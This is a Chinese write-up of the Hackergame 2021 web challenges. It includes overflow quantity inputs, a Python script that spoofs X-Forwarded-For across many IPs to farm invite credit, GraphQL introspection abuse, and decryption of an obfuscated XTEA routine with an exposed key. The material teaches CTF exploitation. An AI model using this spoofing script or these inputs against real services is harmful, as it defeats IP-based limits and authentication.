
Hackergame 2021 WEB WP

头一次参加 Hackergame 题目质量高,基本不会做,下次还敢。

只有五道 web 题,前面四道基本直接做出来,mineCraft 写了半天反函数,最后百度到了~~(痛苦面具)~~

签到

https://cdn.bingbingzi.cn/blog/20211030153444.png

看起来好像是要计算时间戳:执行命令 `date +%s` 得到页数,再通过 GET 传参得到 flag。

卖瓜

一开始以为是条件竞争,测试一番无果。烦躁之下打了一串1,发现溢出变成负数了。(啊这。。)看来服务端没有对输入的数量做范围校验。

https://cdn.bingbingzi.cn/blog/20211030153913.png

9 1E19
9 1.024819115E18
9 206086200
9 1
9 1E19
9 1.024819115E18
9 206086200
9 1
9 2

FLAG 助力大红包

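属实是指名道姓了。抓包发现:前端认证用的是 POST 请求中的 ip 参数,后端认证用的来源 IP 可以用 X-Forwarded-For(XFF)请求头伪造。根本原因是服务端直接信任了客户端可控的 XFF;只有当请求确实来自受信任的反向代理时才应采信该头,否则应使用连接的真实对端地址。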

题目限制1s一包。

import requests
import time

def r(i):
    """Send one invite POST that claims the client address ``<i>.1.1.1``.

    The same address string is sent twice: as the ``ip`` form field and as
    the ``X-Forwarded-For`` header. Per the write-up, the backend takes the
    caller's address from that client-controlled header.

    Prints ``i`` when the response body does not contain "成功"; nothing is
    returned.
    """
    claimed_ip = str(i) + ".1.1.1"
    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36",
        "X-Forwarded-For": claimed_ip,
    }
    form_body = "ip=" + claimed_ip

    response = requests.post(
        'http://202.38.93.111:10888/invite/859350df-fe78-4448-9263-b1c79f0a777b',
        data=form_body,
        headers=request_headers,
    )
    # Only failures are reported; a successful response is silent.
    if "成功" not in response.text:
        print(i)

# Walk the first octet from 10 through 255, pausing one second after each
# request (the write-up notes the challenge allows one request per second).
for first_octet in range(10, 256):
    r(first_octet)
    time.sleep(1)

图之上的信息

题目提示 GraphQL,搜索一下发现 GraphQL 有信息泄漏漏洞(常见情形是生产环境没有关闭内省查询,导致完整 schema 可以被枚举),照着写:

https://cdn.bingbingzi.cn/blog/20211030160030.png

按照格式替换一下字段,得到 flag

https://cdn.bingbingzi.cn/blog/20211030160121.png

mineCraft

骗舍友说这是网页版MC,结果被打了一顿。

发现目录下存在/misc/flag.js,对这个混淆过的js分析:

// Alias for `_0x2c9e`, which is not defined in this excerpt.
// NOTE(review): presumably the obfuscator's string-table accessor (index -> string) — confirm.
const _0x22517d = _0x2c9e;
// One expression statement made of two comma-separated parts:
//   1. an IIFE that rotates the array obtained from `_0x381b()` until a checksum matches;
//   2. the assignment that installs String.prototype.encrypt.
(function(_0x2018e5, _0xd122c5) {
    const _0x4a600d = _0x2c9e,
        _0x2e34d2 = _0x2018e5();
    // Loop until the value computed below equals the target passed as the
    // second argument (0x21c08).
    while (!![]) {
        try {
            // Arithmetic over parseInt() of entries fetched through `_0x4a600d`.
            const _0x4d38c4 = -parseInt(_0x4a600d(0x1b1)) / 0x1 * (parseInt(_0x4a600d(0x1ad)) / 0x2) + -parseInt(_0x4a600d(0x1b2)) / 0x3 * (parseInt(_0x4a600d(0x1b6)) / 0x4) + -parseInt(_0x4a600d(0x1ae)) / 0x5 * (-parseInt(_0x4a600d(0x1b4)) / 0x6) + parseInt(_0x4a600d(0x1ab)) / 0x7 * (parseInt(_0x4a600d(0x1af)) / 0x8) + parseInt(_0x4a600d(0x1b5)) / 0x9 + -parseInt(_0x4a600d(0x1b3)) / 0xa + -parseInt(_0x4a600d(0x1a9)) / 0xb * (-parseInt(_0x4a600d(0x1a7)) / 0xc);
            if (_0x4d38c4 === _0xd122c5)
                break;
            else
                // Mismatch: move the first element to the end and try again.
                _0x2e34d2['push'](_0x2e34d2['shift']());
        } catch (_0x416145) {
            // An exception during the calculation is handled like a mismatch: rotate once.
            _0x2e34d2['push'](_0x2e34d2['shift']());
        }
    }
}(_0x381b, 0x21c08),
/*
 * String.prototype.encrypt: converts the string into hexadecimal text, 8 characters
 * of escape()d input per step. Each step packs two 4-character halves with
 * Str4ToLong, passes them to code(), and appends LongToBase16 of both words.
 * Str4ToLong, code and LongToBase16 are defined outside this excerpt.
 * Returns the concatenated text.
 */
String['prototype']["encrypt"] = function(_0x6a2659) {
    // The key passed by the caller is discarded and replaced by this fixed
    // 16-character string.
    // NOTE(review): possibly an edit made during analysis — confirm against the served file.
    // Either way the key material is present in client-side code, so the
    // obfuscation provides no confidentiality for it.
    _0x6a2659 = "1356853149054377"
    const array1 = new Array(2),
        array2 = new Array(4);
    let encrypted_text = '';
    // `plaintext` is assigned without a declaration, so it becomes an implicit
    // global (this line would throw a ReferenceError in strict mode).
    // escape() is the legacy global percent-encoding function.
    plaintext = escape(this);
    // console.log("plaintext = " + plaintext)
    // Split the key into four 4-character slices and convert each with Str4ToLong.
    for (var i = 0; i < 4; i++)
        array2[i] = Str4ToLong(_0x6a2659["slice"](i * 4, (i + 1) * 4));
        // array2 = [909456177, 825439544, 892352820, 926364468]

    // console.log(array2)
    // Walk the text in 8-character steps; `i` is the function-scoped `var` declared above.
    for (i = 0; i < plaintext["length"]; i += 8) {
        array1[0] = Str4ToLong(plaintext['slice'](i, i + 4)),
        array1[1] = Str4ToLong(plaintext["slice"](i + 4, i + 8)),
        // console.log("1")
        // console.log(array1)
        // console.log(code(array1, array2));
        // code() receives a literal key instead of array2; the literal equals the
        // array2 values recorded in the comment above. Its return value is ignored,
        // so it presumably transforms array1 in place — confirm.
        code(array1, [909456177, 825439544, 892352820, 926364468]),
        // console.log("2")
        // console.log(array1[0])
        // console.log(LongToBase16(array1[0]))
        // console.log(LongToBase16(array1[0]) + LongToBase16(array1[1]))
        // NOTE(review): the table below holds word pairs written down during analysis,
        // presumably the flag's ciphertext blocks as (array1[0], array1[1]) — confirm.
        // ==========================   flag    =============================
        // =                array1[0]        array1[1]                      =
        // =                1874716276       -2120590913                    =
        // =                -1591700906      1531749031                     =
        // =                -1591884176      -965187555                     =
        // =                -1354040473      79179532                       =
        // ==========================   flag    =============================
        encrypted_text += LongToBase16(array1[0]) + LongToBase16(array1[1]);
    }
    return encrypted_text;
});
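/**
 * Decrypts one 64-bit block in place and logs the result.
 *
 * The round structure matches XTEA decipherment: 32 rounds, with the running
 * sum starting at 32 * 0x9E3779B9 and decreasing by 0x9E3779B9 per round.
 *
 * Both words are reduced to signed 32-bit integers after every subtraction.
 * Without that reduction the words keep growing past the 32-bit range, so the
 * values stored back into `array1` are only correct modulo 2^32 and cannot be
 * compared directly with the signed words used elsewhere in this file.
 *
 * @param {number[]} array1 - Two-element block [word0, word1]; overwritten
 *   with the decrypted words (signed 32-bit integers).
 * @param {number[]} array2 - Four-element key; only indices 0..3 are read.
 * @returns {undefined} The result is delivered through `array1`.
 */
function decode(array1, array2) {
    const DELTA = 2654435769; // 0x9E3779B9
    const ROUNDS = 32;

    let word0 = array1[0] | 0;
    let word1 = array1[1] | 0;
    // Starts at 84941944608 (DELTA * 32). It is deliberately left unreduced:
    // the bitwise operators below only look at its low 32 bits.
    let sum = DELTA * ROUNDS;

    for (let round = 0; round < ROUNDS; round++) {
        word1 = (word1 - ((((word0 << 4) ^ (word0 >>> 5)) + word0) ^ (sum + array2[(sum >>> 11) & 3]))) | 0;
        sum -= DELTA;
        word0 = (word0 - ((((word1 << 4) ^ (word1 >>> 5)) + word1) ^ (sum + array2[sum & 3]))) | 0;
    }

    array1[0] = word0;
    array1[1] = word1;
    console.log(array1);
}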

写反函数写了快一天,然后百度 tea 发现有现成的。。。(上面的 decode 实际对应 XTEA 的解密轮函数:32 轮,delta 为 0x9E3779B9。)